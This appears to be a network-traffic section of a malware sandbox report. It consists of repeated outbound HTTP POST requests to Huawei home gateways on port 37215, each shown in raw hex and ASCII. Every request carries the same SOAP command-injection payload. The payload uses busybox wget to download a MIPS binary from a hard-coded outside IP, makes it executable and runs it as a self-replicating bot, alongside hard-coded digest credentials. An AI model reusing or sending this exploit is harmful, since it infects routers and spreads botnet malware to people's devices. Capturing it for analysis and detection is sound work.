                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1756192.168.2.2359928197.145.221.15837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.583540916 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1757192.168.2.233455641.120.4.7437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.583606005 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1758192.168.2.234250841.230.228.16237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.583606005 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1759192.168.2.2360358197.169.20.19537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.583606005 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1760192.168.2.2354344157.62.6.23137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.583705902 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1761192.168.2.235186441.207.67.19837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.583725929 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1762192.168.2.234269641.220.248.19937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.583750963 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1763192.168.2.2333590197.191.125.4937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.584126949 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1764192.168.2.235299683.88.77.6037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.584136009 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1765192.168.2.2348722166.47.237.16837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.584137917 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
